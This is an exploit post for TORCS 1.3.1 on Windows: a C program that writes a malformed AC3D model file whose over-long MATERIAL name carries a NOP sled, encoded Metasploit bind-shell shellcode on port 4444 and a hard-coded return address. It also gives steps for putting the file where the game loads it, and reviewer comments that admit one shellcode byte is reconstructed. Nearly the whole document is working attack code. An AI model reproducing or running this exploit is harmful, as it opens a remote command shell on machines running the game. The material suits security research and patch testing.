
TORCS 1.3.1 Buffer Overflow

Posted on 22 December 2011

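/*
 * Exploit Title: TORCS acc Buffer Overflow
 * Date: 20/12/2011
 * Author: Andres Gomez
 * Software Link: http://torcs.sourceforge.net/
 * Version: torcs 1.3.1
 * Tested on: Windows
 * CVE :
 *
 * This program only GENERATES a malformed AC3D model file (test.acc); the
 * overflow itself happens inside TORCS when it loads that file.  The payload
 * is carried in the quoted name of a MATERIAL record: NOP_SLED_LEN NOP bytes,
 * then the shellcode, then the 4-byte value (function_pointer) that lands on
 * the saved return address.  Per the original notes, the file has to be saved
 * where TORCS loads its data -- e.g. replace cars/car4-trb1/car4-trb1.acc
 * with test.acc, or create a new car/track and select it in the TORCS menu.
 *
 * Reviewer notes (not part of the original listing):
 *  - The archived listing had every backslash stripped from its escape
 *    sequences ("x90", "MATERIAL """) and would not compile; they are
 *    restored here.  Trailing spaces inside the format strings are taken to
 *    be "\n", because AC3D is a line-oriented format.  One spot in the
 *    shellcode read "xccc" in the listing and is reconstructed as "\xcc";
 *    verify both points against the original source before relying on them.
 *  - The shellcode is a stock Metasploit windows/shell_bind_tcp on LPORT
 *    4444: loading test.acc in a vulnerable TORCS leaves a command shell
 *    listening on that port with the game's privileges, reachable by anyone
 *    who can reach the host.  Run it only inside an isolated lab VM.
 *  - function_pointer (0x100ECAA8, written little-endian) is hard-coded for
 *    the author's build; on any other build or OS the game will crash
 *    rather than run the payload.
 *  - NOP_SLED_LEN (607) fixes the distance to the saved return address.  Do
 *    not change it without re-deriving the offset in a debugger.
 *  - Bad chars excluded from the encoding: \x00 would terminate the C string
 *    that %s emits (and presumably the loader's own string handling), \x0a
 *    would end the line; \xff was excluded by the author for an unstated
 *    reason.
 *  - The file is opened in text mode ("w") exactly as in the original.  On
 *    Windows that turns "\n" into "\r\n"; the author tested it that way, and
 *    the payload bytes themselves contain no \x0a, so they are not altered.
 *  - "kids 5" is kept verbatim: it declares five child objects the file
 *    never supplies.  Whether that is part of the trigger is not documented.
 */
#include <stdio.h>
#include <stdlib.h>

/*
 * Shellcode: windows/shell_bind_tcp LPORT=4444 -b '\x00\xff\x0a'
 * Encoder: x86/shikata_ga_nai
 * 368 bytes; contains no \x00, so it can be emitted with %s.
 */
unsigned char buf[] =
"\xbd\x2e\xed\xb6\x2d\xdd\xc2\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x56\x83\xee\xfc\x31\x6e\x0f\x03\x6e\x21\x0f\x43\xd1\xd5\x46"
"\xac\x2a\x25\x39\x24\xcf\x14\x6b\x52\x9b\x04\xbb\x10\xc9\xa4"
"\x30\x74\xfa\x3f\x34\x51\x0d\x88\xf3\x87\x20\x09\x32\x08\xee"
"\xc9\x54\xf4\xed\x1d\xb7\xc5\x3d\x50\xb6\x02\x23\x9a\xea\xdb"
"\x2f\x08\x1b\x6f\x6d\x90\x1a\xbf\xf9\xa8\x64\xba\x3e\x5c\xdf"
"\xc5\x6e\xcc\x54\x8d\x96\x67\x32\x2e\xa6\xa4\x20\x12\xe1\xc1" /* "xccc" in the listing -> \xcc, verify */
"\x93\xe0\xf0\x03\xea\x09\xc3\x6b\xa1\x37\xeb\x66\xbb\x70\xcc"
"\x98\xce\x8a\x2e\x25\xc9\x48\x4c\xf1\x5c\x4d\xf6\x72\xc6\xb5"
"\x06\x57\x91\x3e\x04\x1c\xd5\x19\x09\xa3\x3a\x12\x35\x28\xbd"
"\xf5\xbf\x6a\x9a\xd1\xe4\x29\x83\x40\x41\x9c\xbc\x93\x2d\x41"
"\x19\xdf\xdc\x96\x1b\x82\x88\x5b\x16\x3d\x49\xf3\x21\x4e\x7b"
"\x5c\x9a\xd8\x37\x15\x04\x1e\x37\x0c\xf0\xb0\xc6\xae\x01\x98"
"\x0c\xfa\x51\xb2\xa5\x82\x39\x42\x49\x57\xed\x12\xe5\x07\x4e"
"\xc3\x45\xf7\x26\x09\x4a\x28\x56\x32\x80\x5f\x50\xfc\xf0\x0c"
"\x37\xfd\x06\xa3\x9b\x88\xe1\xa9\x33\xdd\xba\x45\xf6\x3a\x73"
"\xf2\x09\x69\x2f\xab\x9d\x25\x39\x6b\xa1\xb5\x6f\xd8\x0e\x1d"
"\xf8\xaa\x5c\x9a\x19\xad\x48\x8a\x50\x96\x1b\x40\x0d\x55\xbd"
"\x55\x04\x0d\x5e\xc7\xc3\xcd\x29\xf4\x5b\x9a\x7e\xca\x95\x4e"
"\x93\x75\x0c\x6c\x6e\xe3\x77\x34\xb5\xd0\x76\xb5\x38\x6c\x5d"
"\xa5\x84\x6d\xd9\x91\x58\x38\xb7\x4f\x1f\x92\x79\x39\xc9\x49"
"\xd0\xad\x8c\xa1\xe3\xab\x90\xef\x95\x53\x20\x46\xe0\x6c\x8d"
"\x0e\xe4\x15\xf3\xae\x0b\xcc\xb7\xdf\x41\x4c\x91\x77\x0c\x05"
"\xa3\x15\xaf\xf0\xe0\x23\x2c\xf0\x98\xd7\x2c\x71\x9c\x9c\xea"
"\x6a\xec\x8d\x9e\x8c\x43\xad\x8a";

/*
 * Value that overwrites the saved return address and redirects execution
 * into the NOP sled: 0x100ECAA8, little-endian.  Valid only for the build
 * the author tested against.
 */
unsigned char function_pointer[] = "\xA8\xCA\x0E\x10";

enum {
    NOP_SLED_LEN = 607,  /* NOP bytes before the shellcode; sets the offset */
    WORLD_KIDS   = 5     /* child count written after "OBJECT world"        */
};

/* Output path, relative to the current directory. */
static const char OUT_FILE[] = "test.acc";

/*
 * Writes test.acc and returns 0 on success, -1 if the file could not be
 * opened or fully flushed.  Command-line arguments are ignored.
 */
int main(int argc, char **argv)
{
    (void)argc;
    (void)argv;

    /* Text mode on purpose: this is how the original was tested (see header). */
    FILE *save_fd = fopen(OUT_FILE, "w");
    if (save_fd == NULL) {
        printf("Failed to open '%s' for writing", OUT_FILE);
        return -1;
    }

    /* AC3D signature line. */
    fputs("AC3Db\n", save_fd);

    /*
     * Over-long material name: opening quote, NOP sled, shellcode, return
     * address, closing quote, then the rest of a syntactically valid
     * MATERIAL record so the loader keeps parsing up to the overflow.
     */
    fputs("MATERIAL \"", save_fd);
    for (size_t i = 0; i < NOP_SLED_LEN; i++) {
        putc(0x90, save_fd);
    }
    fprintf(save_fd,
            "%s%s\" rgb 0.4 0.4 0.4 amb 0.8 0.8 0.8 emis 0.4 0.4 0.4 spec 0.5 0.5 0.5 shi 50 trans 0\n",
            (const char *)buf, (const char *)function_pointer);

    fputs("OBJECT world\n", save_fd);
    fprintf(save_fd, "kids %d\n", WORLD_KIDS);

    /*
     * The original called close() on a FILE*, which neither flushes stdio's
     * buffer nor is declared by the headers included here.  fclose() is the
     * matching call; a failure means test.acc is truncated and useless.
     */
    if (fclose(save_fd) != 0) {
        printf("Failed to write '%s'", OUT_FILE);
        return -1;
    }
    return 0;
}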

 
